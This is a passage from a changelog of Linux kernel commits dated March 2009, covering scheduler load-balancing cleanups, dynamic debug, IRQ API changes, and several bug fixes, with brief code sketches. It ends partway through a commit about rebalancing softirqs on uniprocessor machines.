- 25 March 2009, 13 commits
-
-
Submitted by Gautham R Shenoy

Impact: cleanup

Add /** style comments around find_busiest_group(). Also add a few explanatory comments. This concludes the find_busiest_group() cleanup. The function is now down to 72 lines from the original 313 lines.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091427.13992.18933.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Impact: cleanup

Create separate helper functions to initialize the power-savings-balance related variables, to update them, and to check whether there is scope for performing power-savings balance. Add no-op inline functions for the !(CONFIG_SCHED_MC || CONFIG_SCHED_SMT) case. This will eliminate all the #ifdef jungle in find_busiest_group() and the other helper functions.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091422.13992.73616.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
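The pattern described here — real helpers when CONFIG_SCHED_MC or CONFIG_SCHED_SMT is set, empty inline stubs otherwise — can be sketched as follows. The helper names and the stats arguments are one plausible naming, and the bodies are abridged; this is an illustration of the technique, not the literal patch:

    #if defined(CONFIG_SCHED_MC) || defined(CONFIG_SCHED_SMT)
    /* Power-savings balancing is compiled in: do the real bookkeeping. */
    static inline void init_sd_power_savings_stats(struct sched_domain *sd,
                    struct sd_lb_stats *sds, enum cpu_idle_type idle)
    {
            /* Only worth trying when this CPU is idle and the domain allows it. */
            sds->power_savings_balance = (idle != CPU_NOT_IDLE) &&
                                         (sd->flags & SD_POWERSAVINGS_BALANCE);
    }

    static inline void update_sd_power_savings_stats(struct sched_group *group,
                    struct sd_lb_stats *sds, int local_group,
                    struct sg_lb_stats *sgs)
    {
            if (!sds->power_savings_balance)
                    return;
            /* ... track the least-loaded candidate groups here ... */
    }
    #else
    /* Neither SCHED_MC nor SCHED_SMT: the call sites stay #ifdef-free. */
    static inline void init_sd_power_savings_stats(struct sched_domain *sd,
                    struct sd_lb_stats *sds, enum cpu_idle_type idle) { }
    static inline void update_sd_power_savings_stats(struct sched_group *group,
                    struct sd_lb_stats *sds, int local_group,
                    struct sg_lb_stats *sgs) { }
    #endif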
-
Submitted by Gautham R Shenoy

Impact: cleanup, micro-optimization

We don't need to perform power_savings balance if either the cpu is NOT_IDLE or if the sched_domain doesn't have the SD_POWERSAVINGS_BALANCE flag set. Currently we check for these conditions multiple times, even though these variables don't change over the scope of find_busiest_group(). Check once, and store the value in the already existing "power_savings_balance" variable.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091417.13992.2657.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Move all the imbalance calculation out of find_busiest_group() through this helper function. With this change, the structure of find_busiest_group() will be as follows:

- update_sched_domain_statistics.
- check if an imbalance exists.
- update the imbalance and return the busiest group.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091411.13992.43293.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
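Schematically — as a sketch of the resulting shape only, with arguments simplified and helper names assumed, not the literal kernel code — find_busiest_group() then reduces to:

    static struct sched_group *
    find_busiest_group(struct sched_domain *sd, unsigned long *imbalance)
    {
            struct sd_lb_stats sds;

            /* 1. Gather all sched_domain and sched_group statistics in one pass. */
            update_sd_lb_stats(sd, &sds);

            /* 2. Decide whether any imbalance exists; bail out early if not. */
            if (!sds.busiest || sds.busiest_nr_running == 0)
                    goto out_balanced;

            /* 3. Compute how much load to move and hand back the busiest group. */
            calculate_imbalance(&sds, imbalance);
            return sds.busiest;

    out_balanced:
            *imbalance = 0;
            return NULL;
    }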
-
Submitted by Gautham R Shenoy

Impact: cleanup

We have two places in find_busiest_group() where we need to calculate the minor imbalance before returning the busiest group. Encapsulate this functionality into a separate helper function.

Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
LKML-Reference: <20090325091406.13992.54316.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Impact: cleanup

Create a helper function named update_sd_lb_stats() to update the various sched_domain related statistics in find_busiest_group(). With this, all of the statistics computation has been moved out of find_busiest_group().

Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
LKML-Reference: <20090325091401.13992.88737.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Impact: cleanup

Currently we use a lot of local variables in find_busiest_group() to capture the various statistics related to the sched_domain. Group them together into a single data structure. This will help us offload the job of updating the sched_domain statistics to a helper function.

Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
LKML-Reference: <20090325091356.13992.25970.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
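A sketch of what such a per-sched_domain container can look like (field names are illustrative, chosen to mirror the statistics discussed in this series rather than copied from the final code):

    /* Statistics of the sched_domain, filled in once per load-balance attempt. */
    struct sd_lb_stats {
            struct sched_group *busiest;     /* busiest group in this domain */
            struct sched_group *this;        /* group containing this CPU */
            unsigned long total_load;        /* total load of all groups */
            unsigned long total_pwr;         /* total cpu_power of all groups */
            unsigned long avg_load;          /* average load across the domain */

            /* statistics of the local group */
            unsigned long this_load;
            unsigned long this_load_per_task;
            unsigned long this_nr_running;

            /* statistics of the busiest group */
            unsigned long max_load;
            unsigned long busiest_load_per_task;
            unsigned long busiest_nr_running;
    };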
-
Submitted by Gautham R Shenoy

Impact: cleanup

Create a helper function named update_sg_lb_stats() which can be invoked to calculate the individual group's statistics in find_busiest_group(). This reduces the length of find_busiest_group() considerably.

Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
LKML-Reference: <20090325091351.13992.43461.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Impact: cleanup

Currently a whole bunch of variables are used to store the various statistics pertaining to the groups we iterate over in find_busiest_group(). Group them together in a single data structure and add appropriate comments. This will be useful later on when we create helper functions to calculate the sched_group statistics.

Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
LKML-Reference: <20090325091345.13992.20099.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
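The per-group counterpart can be sketched like this (again with illustrative field names, mirroring the quantities find_busiest_group() already tracks per group):

    /* Statistics of one sched_group, gathered while walking the domain's groups. */
    struct sg_lb_stats {
            unsigned long avg_load;          /* avg load across the CPUs of the group */
            unsigned long group_load;        /* total load over the group's CPUs */
            unsigned long sum_nr_running;    /* nr of tasks running in the group */
            unsigned long sum_weighted_load; /* weighted load of the group's tasks */
            unsigned long group_capacity;    /* nr of tasks the group can handle */
            int group_imb;                   /* is there an imbalance within the group? */
    };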
-
Submitted by Gautham R Shenoy

Impact: cleanup

Some indentation in find_busiest_group() can be minimized by using early exits with the help of gotos. This improves readability in a couple of cases.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091340.13992.45062.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Gautham R Shenoy

Impact: cleanup

Currently the load idx calculation code is in find_busiest_group(). Move that to a static inline helper function. Similarly, to find the first cpu of a sched_group we use cpumask_first(sched_group_cpus(group)); use a helper for that as well. It improves readability in some cases.

Signed-off-by: Gautham R Shenoy <ego@in.ibm.com>
Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: "Balbir Singh" <balbir@in.ibm.com>
Cc: Nick Piggin <nickpiggin@yahoo.com.au>
Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
LKML-Reference: <20090325091335.13992.55424.stgit@sofia.in.ibm.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
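Both helpers are small; a plausible sketch (not necessarily the exact patch) is:

    /* First CPU of a sched_group. */
    static inline unsigned int group_first_cpu(struct sched_group *group)
    {
            return cpumask_first(sched_group_cpus(group));
    }

    /* Pick which load index of the sched_domain to use for this balance pass. */
    static inline int get_sd_load_idx(struct sched_domain *sd,
                                      enum cpu_idle_type idle)
    {
            switch (idle) {
            case CPU_NOT_IDLE:
                    return sd->busy_idx;
            case CPU_NEWLY_IDLE:
                    return sd->newidle_idx;
            default:
                    return sd->idle_idx;
            }
    }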
-
Submitted by Jason Baron

This patch combines Greg Banks' dprintk() work with the existing dynamic printk patchset; we are now calling it 'dynamic debug'. The new feature of this patchset is a richer /debugfs control file interface (an example output from my system is at the bottom), which allows fine-grained control over the debug output. The output can be controlled by function, file, module, format string, and line number.

For example, to enable all debug messages in module 'nf_conntrack':

echo -n 'module nf_conntrack +p' > /mnt/debugfs/dynamic_debug/control

To disable them:

echo -n 'module nf_conntrack -p' > /mnt/debugfs/dynamic_debug/control

A further explanation can be found in the documentation patch.

Signed-off-by: Greg Banks <gnb@sgi.com>
Signed-off-by: Jason Baron <jbaron@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
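The call sites being toggled are ordinary pr_debug()/dev_dbg() statements; a generic example of the kind of statement this controls (not taken from nf_conntrack, names hypothetical) would be:

    #include <linux/kernel.h>

    static void frob_widget(int id)
    {
            /* Always compiled in with CONFIG_DYNAMIC_DEBUG=y, but only emitted
             * once this call site is enabled through the debugfs control file. */
            pr_debug("frobbing widget %d\n", id);
    }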
-
Submitted by Luis Henriques

Impact: cleanup, new schedstat ABI

Since they are used only in statistics and are always set to zero, the following fields have been removed from struct rq: yld_exp_empty, yld_act_empty and yld_both_empty. Both the Sched Debug and SCHEDSTAT_VERSION versions have also been incremented, since the ABIs have changed.

The schedtop tool has been updated to properly handle the new version of schedstat:
http://rt.wiki.kernel.org/index.php/Schedtop_utility

Signed-off-by: Luis Henriques <henrix@sapo.pt>
Acked-by: Gregory Haskins <ghaskins@novell.com>
Acked-by: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <20090324221002.GA10061@hades.domain.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
- 24 March 2009, 2 commits
-
-
Submitted by Oleg Nesterov

See http://bugzilla.kernel.org/show_bug.cgi?id=12911

copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost", because posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus fastpath_timer_check() returns false unless we have other cpu timers.

This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not optimal; we need further cleanups here. With this patch update_rlimit_cpu() is not really needed, but I don't think it should be removed.

The proper fix (I think) is:

- set_process_cpu_timer() should just start the cputimer->running logic (it does); no need to change cputime_expires.xxx_exp
- posix_cpu_timers_init_group() should set ->running when needed
- fastpath_timer_check() can check ->running instead of task_cputime_zero(signal->cputime_expires)

Reported-by: Peter Lojkin <ia6432@inbox.ru>
Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Roland McGrath <roland@redhat.com>
Cc: <stable@kernel.org> [for 2.6.29.x]
LKML-Reference: <20090323193411.GA17514@redhat.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
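The minimal fix amounts to re-arming the process-wide expiry from the inherited RLIMIT_CPU at fork time, roughly along these lines (a sketch that assumes the secs_to_cputime() conversion helper; the rest of the initialization is elided):

    static void posix_cpu_timers_init_group(struct signal_struct *sig)
    {
            /* The expiry fields start out zeroed, which is why an inherited
             * RLIMIT_CPU would otherwise be ignored by fastpath_timer_check(). */
            if (sig->rlim[RLIMIT_CPU].rlim_cur != RLIM_INFINITY)
                    sig->cputime_expires.prof_exp =
                            secs_to_cputime(sig->rlim[RLIMIT_CPU].rlim_cur);
    }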
-
Submitted by Miklos Szeredi

This patch fixes bug #12208:

Bug-Entry: http://bugzilla.kernel.org/show_bug.cgi?id=12208
Subject: uml is very slow on 2.6.28 host

This turned out to be not a scheduler regression, but an already existing problem in ptrace being triggered by subtle scheduler changes.

The problem is this:

- task A is ptracing task B
- task B stops on a trace event
- task A is woken up and preempts task B
- task A calls ptrace on task B, which does ptrace_check_attach()
- this calls wait_task_inactive(), which sees that task B is still on the runq
- task A goes to sleep for a jiffy
- ...

Since UML does lots of the above sequences, those jiffies quickly add up to make it slow as hell.

This patch solves this by not rescheduling in read_unlock() after ptrace_stop() has woken up the tracer.

Thanks to Oleg Nesterov and Ingo Molnar for the feedback.

Signed-off-by: Miklos Szeredi <mszeredi@suse.cz>
CC: stable@kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-
- 18 March 2009, 2 commits
-
-
Submitted by Luis Henriques

The jiffies value was being printed for each CPU, which does not seem to make sense. Moved jiffies to the system section.

Signed-off-by: Luis Henriques <henrix@sapo.pt>
Acked-by: Peter Zijlstra <peterz@infradead.org>
LKML-Reference: <20090318000425.GA2228@hades.domain.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Masami Hiramatsu

Impact: fix ref-after-free crash on failed module load

Fix refptr bug: change the refptr allocation and release order so that a module data structure pointed to by 'mod' is not accessed after mod->module_core has been freed. This bug can cause a kernel panic (e.g. on failing to find undefined symbols).

This bug was reported on the systemtap bugzilla:
http://sources.redhat.com/bugzilla/show_bug.cgi?id=9927

Signed-off-by: Masami Hiramatsu <mhiramat@redhat.com>
Cc: Eric Dumazet <dada1@cosmosbay.com>
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
-
- 17 March 2009, 2 commits
-
-
Submitted by Luis Henriques

There were three invocations of task_hot() in can_migrate_task(). Replace these three invocations with a single invocation, cached in a local variable.

Signed-off-by: Luis Henriques <henrix@sapo.pt>
LKML-Reference: <20090316195902.GA6197@hades.domain.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
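In outline (a sketch of the idea, not the exact diff), the cached value then drives both the migration decision and the schedstat accounting:

    /* In can_migrate_task(): evaluate once, reuse everywhere. */
    int tsk_cache_hot = task_hot(p, rq->clock, sd);

    if (!tsk_cache_hot ||
        sd->nr_balance_failed > sd->cache_nice_tries) {
            /* aggressive-migration path, with its schedstat bookkeeping */
    }
    if (tsk_cache_hot) {
            schedstat_inc(p, se.nr_failed_migrations_hot);
            return 0;
    }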
-
Submitted by Luis Henriques

Fixed typos in function documentation.

Signed-off-by: Luis Henriques <henrix@sapo.pt>
LKML-Reference: <20090316195809.GA6073@hades.domain.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
- 13 March 2009, 3 commits
-
-
Submitted by Thomas Gleixner

Two years of migration time is enough. Remove the compatibility cruft. Add the deprecation warning in kernel/irq/handle.c, because marking __do_IRQ itself would be way too noisy.

Signed-off-by: Thomas Gleixner <tglx@linutronix.de>

-
Submitted by Thomas Gleixner

Impact: simplification

Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Peter Zijlstra <peterz@infradead.org>
-
Submitted by Thomas Gleixner

Impact: cleanup

The code is only compiled if CONFIG_GENERIC_HARDIRQS=y, so another check for this define in the code is redundant. Remove it.

Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
-
- 12 March 2009, 3 commits
-
-
Submitted by Magnus Damm

Export the setup_irq() and remove_irq() symbols.

I'd like to export these functions since I have timer code that needs to use setup_irq() early on (too early for request_irq()), and the same code can also be compiled as a module.

Signed-off-by: Magnus Damm <damm@igel.co.jp>
LKML-Reference: <20090312120559.2926.82371.sendpatchset@rx1.opensource.se>
[ changed to _GPL as these are special APIs deep inside the irq layer. ]
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Magnus Damm

Modify remove_irq() to match setup_irq().

Signed-off-by: Magnus Damm <damm@igel.co.jp>
LKML-Reference: <20090312120551.2926.43942.sendpatchset@rx1.opensource.se>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Magnus Damm

Impact: add new API

This patch adds a remove_irq() function for releasing interrupts requested with setup_irq(). Without this patch we have no way of releasing such interrupts, since free_irq() today tries to kfree() the irqaction passed with setup_irq().

Signed-off-by: Magnus Damm <damm@igel.co.jp>
LKML-Reference: <20090312120542.2926.56609.sendpatchset@rx1.opensource.se>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
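Usage is symmetric with setup_irq(): the caller owns the struct irqaction (typically statically allocated), so nothing needs to be kfree()d on teardown. A hedged sketch of how a driver might pair the two — the handler, flags and names below are hypothetical:

    #include <linux/interrupt.h>
    #include <linux/irq.h>

    static irqreturn_t my_timer_interrupt(int irq, void *dev_id)
    {
            /* acknowledge the hardware, do the periodic work ... */
            return IRQ_HANDLED;
    }

    /* Caller-owned irqaction: usable before the allocators are up. */
    static struct irqaction my_timer_irqaction = {
            .handler = my_timer_interrupt,
            .flags   = IRQF_TIMER,
            .name    = "my-timer",
    };

    static void my_timer_start(unsigned int irq)
    {
            setup_irq(irq, &my_timer_irqaction);
    }

    static void my_timer_stop(unsigned int irq)
    {
            /* remove_irq() detaches the action but does not kfree() it. */
            remove_irq(irq, &my_timer_irqaction);
    }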
-
- 11 March 2009, 2 commits
-
-
Submitted by Mike Galbraith

Impact: more precise avg_overlap metric - better load-balancing

avg_overlap is used to measure the runtime overlap of the waker and wakee. However, when a process changes behaviour, e.g. a pipe becomes un-congested and we don't need to go to sleep after a wakeup for a while, the avg_overlap value grows stale.

When running, we use the average runtime between preemptions as a measure for avg_overlap, since the amount of runtime can be correlated to cache footprint. The longer we run, the less likely we'll want to be migrated to another CPU.

Signed-off-by: Mike Galbraith <efault@gmx.de>
Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
LKML-Reference: <1236709131.25234.576.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Dhaval Giani

We were returning early in the sysfs directory cleanup function if the user belonged to a non-init user namespace. Because of this, a lot of the cleanup was not done and we were left with a leak. Fix the leak.

Reported-by: Serge Hallyn <serue@linux.vnet.ibm.com>
Signed-off-by: Dhaval Giani <dhaval@linux.vnet.ibm.com>
Acked-by: Serge Hallyn <serue@us.ibm.com>
Tested-by: Serge Hallyn <serue@us.ibm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-
- 10 March 2009, 2 commits
-
-
Submitted by Peter Zijlstra

Impact: micro-optimization

We can avoid the sched domain walk on try_to_wake_up() when we know there are no groups.

Signed-off-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
LKML-Reference: <1236603381.8389.455.camel@laptop>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
-
Submitted by Oleg Nesterov

CLONE_PARENT can fool the ->self_exec_id/parent_exec_id logic. If we re-use the old parent, we must also re-use ->parent_exec_id to make sure exit_notify() sees the right ->xxx_exec_id's when the CLONE_PARENT'ed task exits.

Also, move the "p->parent_exec_id = p->self_exec_id" assignment down, to keep the two different cases together.

Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Cc: Roland McGrath <roland@redhat.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: David Howells <dhowells@redhat.com>
Cc: Serge E. Hallyn <serge@hallyn.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
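The resulting copy_process() logic is, in sketch form (paraphrased, not the verbatim diff):

    /* In copy_process(), once the child is mostly set up: */
    if (clone_flags & (CLONE_PARENT | CLONE_THREAD)) {
            /* Re-using the old parent: re-use its parent_exec_id too, so
             * exit_notify() compares against the right generation later. */
            p->real_parent = current->real_parent;
            p->parent_exec_id = current->parent_exec_id;
    } else {
            p->real_parent = current;
            p->parent_exec_id = current->self_exec_id;
    }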
-
- 09 March 2009, 1 commit
-
-
Submitted by Heiko Carstens

Frans Pop reported the crash below when running an s390 kernel under Hercules:

Kernel BUG at 000738b4 verbose debug info unavailable!
fixpoint divide exception: 0009 #1! SMP
Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot dm_mod dasd_eckd_mod dasd_mod
CPU: 0 Not tainted 2.6.27.19 #13
Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18)
Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118)
           R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0
Krnl GPRS: 00000000 000007d0 7fffffff fffff830 00000000 ffffffff 00000002 0f9ed9b8
           00000000 00008ca0 00000000 0f9ed9b8 0f9edda4 8007386e 0f4f7ec8 0f4f7e98
Krnl Code: 800738aa: a71807d0  lhi %r1,2000
           800738ae: 8c200001  srdl %r2,1
           800738b2: 1d21      dr %r2,%r1
          >800738b4: 5810d10e  l %r1,270(%r13)
           800738b8: 1823      lr %r2,%r3
           800738ba: 4130f060  la %r3,96(%r15)
           800738be: 0de1      basr %r14,%r1
           800738c0: 5800f060  l %r0,96(%r15)
Call Trace:
 ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c)
   <0000000000038502>! do_exit+0x106/0x7c0
   <0000000000038c36>! do_group_exit+0x7a/0xb4
   <0000000000038c8e>! SyS_exit_group+0x1e/0x30
   <0000000000021c28>! sysc_do_restart+0x12/0x16
   <0000000077e7e924>! 0x77e7e924

The reason for this is that cpu time accounting usually only happens from interrupt context, but acct_update_integrals also gets called from process context with interrupts enabled. So in acct_update_integrals we may end up with the following scenario: between reading tsk->stime/tsk->utime and tsk->acct_timexpd, an interrupt happens which updates the accounting values. This causes acct_timexpd to be greater than the former stime + utime.

The subsequent calculation of

dtime = cputime_sub(time, tsk->acct_timexpd);

will be negative, and the division performed by cputime_to_jiffies(dtime) will generate an exception since the result won't fit into a 32-bit register.

In order to fix this, just always disable interrupts while accessing any of the accounting values.

Reported by: Frans Pop <elendil@planet.nl>
Tested by: Frans Pop <elendil@planet.nl>
Cc: stable@kernel.org
Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
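The shape of the fix is simply to bracket the read of the cputime fields and the update of the accumulated values with interrupt disabling. A condensed sketch (not the full function) of acct_update_integrals() after such a change:

    void acct_update_integrals(struct task_struct *tsk)
    {
            if (likely(tsk->mm)) {
                    cputime_t time, dtime;
                    unsigned long flags;

                    /* Keep the tick from updating acct_timexpd behind our back. */
                    local_irq_save(flags);
                    time  = cputime_add(tsk->stime, tsk->utime);
                    dtime = cputime_sub(time, tsk->acct_timexpd);
                    if (cputime_to_jiffies(dtime)) {
                            /* ... fold dtime into acct_rss_mem1/acct_vm_mem1 and
                             * advance tsk->acct_timexpd to 'time' ... */
                    }
                    local_irq_restore(flags);
            }
    }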
-
- 06 March 2009, 2 commits
-
-
Submitted by Lai Jiangshan

Impact: cleanup

Use test_tsk_need_resched(), set_tsk_need_resched() and need_resched() instead of using TIF_NEED_RESCHED directly.

Signed-off-by: Lai Jiangshan <laijs@cn.fujitsu.com>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
LKML-Reference: <49B10BA4.9070209@cn.fujitsu.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
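That is, open-coded flag tests are replaced by the existing accessors, for example (illustrative):

    /* before */
    if (test_tsk_thread_flag(curr, TIF_NEED_RESCHED))
            return;
    set_tsk_thread_flag(curr, TIF_NEED_RESCHED);

    /* after */
    if (test_tsk_need_resched(curr))
            return;
    set_tsk_need_resched(curr);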
-
Submitted by Tejun Heo

Impact: add reserved allocation functionality and use it for module percpu variables

This patch implements reserved allocation from the first chunk. When setting up the first chunk, the arch can ask to set aside a certain number of bytes right after the core static area, which are then available only through a separate reserved allocator. This will be used primarily for module static percpu variables on architectures with limited relocation range, to ensure that the module percpu symbols are inside the relocatable range.

If a reserved area is requested, the first chunk becomes reserved and isn't available for regular allocation. If the first chunk also includes a piggy-backed dynamic allocation area, a separate chunk mapping the same region is created to serve dynamic allocation. The first one is called the static first chunk and the second the dynamic first chunk. Although they share the page map, their different area map initializations guarantee they serve disjoint areas according to their purposes.

If the arch doesn't set up a reserved area, reserved allocation is handled like any other allocation.

Signed-off-by: Tejun Heo <tj@kernel.org>
-
- 05 March 2009, 2 commits
-
-
Submitted by Frederic Weisbecker

Impact: fix function graph trace hang / drop pointless softirq on UP

While debugging a function graph trace hang on an old PII, I saw that it consumed most of its time in the timer interrupt, and the domain rebalancing softirq was the part most involved.

The timer interrupt calls trigger_load_balance(), which decides whether it is worth scheduling a rebalancing softirq.

In the case of a builtin UP kernel, no problem arises because there is no domain in question.

In the case of a builtin SMP kernel running on an SMP box, still no problem: the softirq will be raised each time we reach the next_balance time.

In the case of a builtin SMP kernel running on a UP box (most distros provide default SMP kernels, whatever the box you have), the CPU is attached to the NULL sched domain. So a kind of unexpected behaviour happens:

trigger_load_balance() -> raises the rebalancing softirq
later, in the softirq: run_rebalance_domains() -> rebalance_domains(), where the for_each_domain(cpu, sd) loop is not taken because of the NULL domain we are attached to.

This means rq->next_balance is never updated. So on the next timer tick we will enter trigger_load_balance(), which will always reschedule the rebalancing softirq:

if (time_after_eq(jiffies, rq->next_balance))
        raise_softirq(SCHED_SOFTIRQ);

